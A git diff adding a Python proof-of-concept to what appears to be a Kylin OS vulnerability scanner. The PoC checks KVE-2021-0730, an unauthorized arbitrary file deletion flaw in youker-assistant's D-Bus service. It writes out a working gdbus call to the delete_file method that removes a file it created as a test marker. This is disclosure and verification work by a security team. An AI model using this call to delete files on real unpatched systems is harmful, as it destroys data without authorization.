diff --git a/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py b/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py new file mode 100644 index 0000000000000000000000000000000000000000..199c8229b6d52929b9c9413f9657253d472d760e --- /dev/null +++ b/pocs/kp_2022_0016_unauthorized_access_assistant_systemdaemon_delete_file.py @@ -0,0 +1,84 @@ +import subprocess +from utils import highlight,tree,error +from lib.core.basic import BasePoc +import os +import sqlite3 +import dbus +import pwd +import re +import time + + +POC_NAME = 'unauthorized_access_com_kylin_assistant_systemdaemon_delete_file' + +class unauthorized_access_com_kylin_assistant_systemdaemon_delete_file(BasePoc): + poc_info = { + # 尽量添加以下内容 + 'poc': { + 'Id': 'kp_2022_0016', # poc编号,命名规范为kp_2022_0001_*.py + 'kve': "KVE-2021-0730 ", # kve id + 'ZenTaoID': "67415", # 禅道ID + 'Name': r' youker-assistant存在未授权漏洞_删除文件', # poc名称 + 'Author': 'luojunyou', # poc作者 + 'Create_date': '2022-04-13', # poc创建时间:如'2014-11-19' + }, + 'vul': { + 'Product': 'youker-assistant', # 漏洞所在产品名称 + 'Version': r'低于低于3.0.2-0kylin6k64~rc2', # 产品的版本号 + 'Type': r'任意文件删除', # 漏洞类型 + 'Severity': 'High', # Bug severity + 'Description': r'youker-assistant是UKUI桌面环境的麒麟助手。安全应急响应团队发现麒麟助手的D-Bus服务总线com.kylin.assistant.systemdaemon:: delete_file接口存在未授权删除任意文件漏洞。 ', # 漏洞介绍 + 'DisclosureDate': '2021-07-16', # poc公布时间:如'2014-11-19' + 'ZenTaoURL':'暂不公布', #禅道链接 + 'RepairSolution':r'目前此漏洞已经完成修复,可直接使用命令apt upgrade youker-assistant完成更新。', #修复方案 + } + } + + scan_info = { + 'Target': '', + 'TaskId': '', + 'Mode': 'verify', # verify或exploit, 默认值为verify + 'Verbose': False, # 是否打印详细信息,默认值为False + 'Error': '', # 记录poc失败信息 + 'Success': False, # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True + 'Ret': tree() # 记录额外的poc相关信息 + } + + test_case = { + 'Need_fb': False, + 'Vuln': [], # 列表格式的测试版本 + 'Not_vuln': [], # 同上 + } + + + def verify(self, first=False): + # 漏洞验证方法(mode=verify) + target = self.scan_info.get("Target", "") # 获取测试目标 + verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息 + flag_str = '' #漏洞成立时的特征字符串 + flag_list = [] #漏洞成立时的特征列表 + # 以下是PoC的检测逻辑 + print('testing if {} vulnerability'.format(self.poc_info["poc"]["Name"])) + FileName = self.get_random_str(8) + flag_str = self.get_random_str(20) + try: + self.exec_command_by_root(self,"touch /{}".format(flag_str)) + time.sleep(2) + cmd = "gdbus call --system --dest com.kylin.assistant.systemdaemon --object-path /com/kylin/assistant/systemdaemon --method com.kylin.assistant.systemdaemon.delete_file /{}".format(flag_str) + os.popen(cmd) + if os.path.isfile("/{}".format(flag_str)) == False : + msg = r'本机 ( {} ) 存在 {} (禅道ID : {} ) 。 漏洞描述 : {} '.format(self.scan_info['Target'],self.poc_info["poc"]["Name"],self.poc_info["poc"]["ZenTaoID"],self.poc_info["vul"]["Description"]) + print(msg) + self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须) + self.scan_info['Ret']['VerifyInfo']['Target'] = 'localhost' # 记录漏洞相关的一些额外信息(可选) + self.scan_info['Ret']['VerifyInfo']['DATA'] = msg + if verbose: + highlight('[*] {} vul found'.format(self.poc_info["poc"]["Name"])) + except Exception as e: + #print(e) + error('[*] {} vul running error : {}'.format(self.poc_info["poc"]["Name"],str(e))) + + + def exploit(self, first=False): + # 漏洞利用方法(mode=verify) + self.verify(first=first)